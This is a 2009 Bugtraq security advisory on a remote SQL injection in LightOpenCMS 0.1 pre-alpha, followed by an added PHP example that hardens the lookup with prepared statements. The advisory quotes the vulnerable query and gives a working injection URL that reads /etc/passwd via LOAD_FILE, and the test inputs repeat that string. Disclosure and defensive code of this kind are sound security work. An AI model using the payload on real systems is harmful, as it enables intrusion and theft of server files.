Bugtraq mailing list archives
LightOpenCMS 0.1 pre-alpha Remote SQL Injection
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx () gmail com>
Date: Fri, 5 Jun 2009 15:38:17 +0200
******** Salvatore "drosophila" Fresta ********

[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms

[+] Bugs: [A] Remote SQL Injection

[+] Exploitation: Remote
[+] Date: 05 Jun 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com

***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***************************************************

[+] Bugs

- [A] Remote SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php

This bug allows a guest to inject arbitrary SQL statements.

...

if (isset($_GET['id'])) {
    $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'");
    return mysql_fetch_assoc($result);

...

***************************************************

[+] Code

- [A] Remote SQL Injection

http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4%23

***************************************************

[+] Fix

No fix.

***************************************************

--
Salvatore Fresta aka drosophila
CWNP444351
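The advisory lists no fix. As an added example (not code from LightOpenCMS or from the advisory's author), this is one way the dbc.php lookup could be written with a bound parameter instead of string concatenation. The function name, the integer-id rule, the title and body columns and the in-memory SQLite database are assumptions made so the example runs offline.

```php
<?php
declare(strict_types=1);

// Hypothetical hardened replacement for the lookup quoted from dbc.php.
// Returns the page row as an associative array, or null when the id is
// malformed or no such page exists.
function get_page_by_id(PDO $db, $rawId): ?array
{
    // Assumption: page ids are positive integers. Arrays (?id[]=1) and any
    // value that is not a plain decimal number are rejected before the query.
    if (!is_string($rawId) || preg_match('/\A[1-9][0-9]{0,8}\z/', $rawId) !== 1) {
        return null;
    }
    // The id travels as a bound parameter, so it is never parsed as SQL text
    // and does not depend on magic_quotes_gpc (removed in PHP 5.4).
    $stmt = $db->prepare('SELECT * FROM pages WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data; SQLite stands in for the application's MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO pages (id, title, body) VALUES (1, 'Home', 'Welcome')");

// Inputs as they would arrive in $_GET['id'] after URL decoding.
$inputs = [
    '1',                                                        // existing page
    '2',                                                        // well-formed, no such page
    "-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4#",     // string from the advisory
    ['1'],                                                      // array parameter
];

foreach ($inputs as $input) {
    $row = get_page_by_id($db, $input);
    echo json_encode($input), ' => ', $row === null ? 'no page' : $row['title'], PHP_EOL;
}
```

When the same code is pointed at MySQL through PDO, set `PDO::ATTR_EMULATE_PREPARES` to `false` and declare the charset in the DSN so the server, not the client library, handles the parameter.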